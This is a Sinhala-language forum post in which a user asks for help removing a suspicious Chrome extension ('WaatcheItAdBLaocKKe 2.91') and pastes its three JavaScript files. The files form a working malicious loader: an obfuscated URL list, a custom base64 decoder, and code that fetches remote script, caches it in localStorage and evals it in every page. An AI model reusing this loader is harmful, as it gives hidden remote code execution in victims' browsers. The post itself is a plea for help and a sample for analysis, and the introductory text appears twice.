මචන්ලා මගේ google chrome browser එකට adware/malware attack එකක් ඇවිත්. ඒක chrome extension එකක්
නම - WaatcheItAdBLaocKKe 2.91
Permissions - all
මේ ඉන්නේ ඔය මම කියන හොර ගෙඩියා.
මම මේක අයින් කරන්න හැම දේම වගේ කරා.
ගූගල් කරා
බ්රව්සර් එක uninstall කරල install කරා
පරිගණකයේ අනවශ්ය මෟදුකාංග ඉවත් කරා.
පස්සේ chrome install වෙන තැනට ගිහින් එකේ සැක හිතුන extensions del කරා
මේ මොන රෙද්ද කරත් හරිගියේ නෑ බන්.
මේකේ ඉන්න වැඩ්ඩෝ ටික මට හෙල්ප් කරන්න මේක අයින් කරගන්න
මට සැක හිතුන chrome extension එකේ .js files ටික මම මෙතන දාන්නම්.
content.js
Il4yjnDF.js
lsdb.js
මාර අවුල බන් මගේ හිතට හරි නෑ. chrome එපා උනා.
නම - WaatcheItAdBLaocKKe 2.91
Permissions - all
මේ ඉන්නේ ඔය මම කියන හොර ගෙඩියා.
මම මේක අයින් කරන්න හැම දේම වගේ කරා.
ගූගල් කරා
බ්රව්සර් එක uninstall කරල install කරා
පරිගණකයේ අනවශ්ය මෟදුකාංග ඉවත් කරා.
පස්සේ chrome install වෙන තැනට ගිහින් එකේ සැක හිතුන extensions del කරා
මේ මොන රෙද්ද කරත් හරිගියේ නෑ බන්.
මේකේ ඉන්න වැඩ්ඩෝ ටික මට හෙල්ප් කරන්න මේක අයින් කරගන්න
මට සැක හිතුන chrome extension එකේ .js files ටික මම මෙතන දාන්නම්.
content.js
Code:
chrome.extension.sendRequest({m:1},function(a){try{eval(a)}catch(b){chrome.extension.sendRequest({m:2},function(a){try{eval(a)}catch(b){}})}});Il4yjnDF.js
Code:
chrome.extension.onRequest.addListener(function(a,b,c){switch(a.m){default:c(svar.get());break;case 2:c(svar.get(1))}});window.onload=function(){nz.init()};
var zycript={xlat:"abcdwxyzstuvrqponmijklefghABCDWXYZSTUVMNOPQRIJKLEFGH9876543210+/",decode:function(a){for(var a=a.replace(/[^A-Za-z0-9\+\/]/g,""),b="",c=0;c<a.length;){var d=this.xlat.indexOf(a.charAt(c++)),e=this.xlat.indexOf(a.charAt(c++)),f=this.xlat.indexOf(a.charAt(c++)),g=this.xlat.indexOf(a.charAt(c++)),h=(e&15)<<4|f>>2,i=(f&3)<<6|g,b=b+String.fromCharCode(d<<2|e>>4);64!=f&&0<h&&(b+=String.fromCharCode(h));64!=g&&0<i&&(b+=String.fromCharCode(i))}return this._utf8_decode(b)},_utf8_decode:function(a){for(var b="",c=0;c<a.length;){var d=a.charCodeAt(c);if(128>d)b+=String.fromCharCode(d),
c++;else if(191<d&&224>d)var e=a.charCodeAt(c+1),b=b+String.fromCharCode((d&31)<<6|e&63),c=c+2;else var e=a.charCodeAt(c+1),f=a.charCodeAt(c+2),b=b+String.fromCharCode((d&15)<<12|(e&63)<<6|f&63),c=c+3}return b}},svar={def:'void(0);',content:null,get:function(a){return a||!this.content?(setTimeout(nz.init,1),this.def):this.content}},nz={init:function(){dbc.get(function(a){var b=a&&a.epoch?parseInt(a.epoch):0;if(!a||!a.scode||!b||b<=nz.epoch())syncer.sync();else{nz.setsvar(a.scode);try{var c=a.epoch-nz.epoch();3600>c&&setTimeout(syncer.sync,c)}catch(d){}}})},setsvar:function(a){a&&5<a.length&&(svar.content=a)},epoch:function(){try{var a=new Date;try{return(a.getTime()-a.getMilliseconds())/
1E3}catch(b){return parseInt(a.getTime()/1E3)}}catch(c){return 0}}},dbc={engines:["lsdb"],get:function(a){var b=this.engines[0];if(!b)return a(!1);dbc[b].fetch(a)},set:function(a,b){var c=this.engines[0];if(!c)return b(!1);dbc[c].store(a,b)},swap:function(a){if(this.engines&&this.engines[1])try{var b=this.engines[1];delete this.engines[0];this.engines.sort();var c=document.createElement("script");c.type="text/javascript";c.async=!0;c.src=b+".js";document.getElementsByTagName("head")[0].appendChild(c);
c.readyState?c.onreadystatechange=function(){if("loaded"==c.readyState||"complete"==c.readyState)c.onreadystatechange=null,a()}:c.onload=function(){a()}}catch(d){}}},syncer={url:zycript.decode("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"),s:!1,working:!1,bs:!1,sync:function(){dbc.get(function(a){syncer.get(!a||!a.url||13>a.url.length?syncer.url:a.url)})},get:function(a){if(!a)return this.failed();if(!this.working){this.s=!1;var b=a.split(";"),c=Math.floor(Math.random()*b.length);syncer.ajax(b[c],syncer.save);setTimeout(function(){syncer.working=
!1;if(!syncer.s){try{syncer.xhr&&syncer.xhr.abort()}catch(a){}delete b[c];syncer.get(b.join(";"))}},6E4)}},ajax:function(a,b){try{this.bs&&(a=a.replace("?","?rmbs=1&")),this.working=1,this.xhr=new XMLHttpRequest,this.xhr.open("GET",a,!0),this.xhr.onreadystatechange=function(){4==syncer.xhr.readyState&&b(syncer.xhr.responseText)},this.xhr.send()}catch(c){}},save:function(a){if(a){a=a.replace(/^\s\s*/,"").replace(/\s\s*$/,"");"{"!=a.charAt(0)&&(a=zycript.decode(a));if(!a)return syncer.rmbs();try{var b=
JSON.parse(a);if(b.useconds&&!("number"!=typeof b.useconds||!b.update_url||!b.scode)){try{nz.setsvar(b.scode),syncer.s=1}catch(c){}var d=nz.epoch();dbc.set({scode:b.scode,url:b.update_url,epoch:604800<b.useconds?d+604800:d+b.useconds},function(a){a&&(syncer.s=1);nz.setsvar(a.scode)})}}catch(e){syncer.rmbs()}}},rmbs:function(){this.bs=1},failed:function(){var a=10800;try{a=Math.floor(86400*Math.random())}catch(b){}dbc.set({epoch:nz.epoch()+a,url:syncer.url})}};
try{var aUrl='',epoch=nz.epoch();aUrl&&(!localStorage.getItem("install_time")&&43200>Math.abs(epoch-1391131118))&&(localStorage.setItem("install_time",1),chrome.tabs.create({url:aUrl}))}catch(e){};lsdb.js
Code:
dbc.lsdb={fetch:function(a){try{return a({scode:localStorage.getItem("scode")?localStorage.getItem("scode"):!1,url:localStorage.getItem("url")?localStorage.getItem("url"):!1,epoch:localStorage.getItem("epoch")?localStorage.getItem("epoch"):!1})}catch(b){dbc.swap(function(){dbc.get(a)})}},store:function(a,b){if(!a)return b?b(!1):!1;try{for(i in a)a[i]&&localStorage.setItem(i,a[i]);for(i in a)if(a[i]&&localStorage.getItem(i)!=a[i]){dbc.swap(function(){dbc.set(a,b)});break}b&&b(a)}catch(c){dbc.swap(function(){dbc.set(a,b)})}}};මාර අවුල බන් මගේ හිතට හරි නෑ. chrome එපා උනා.
Last edited:
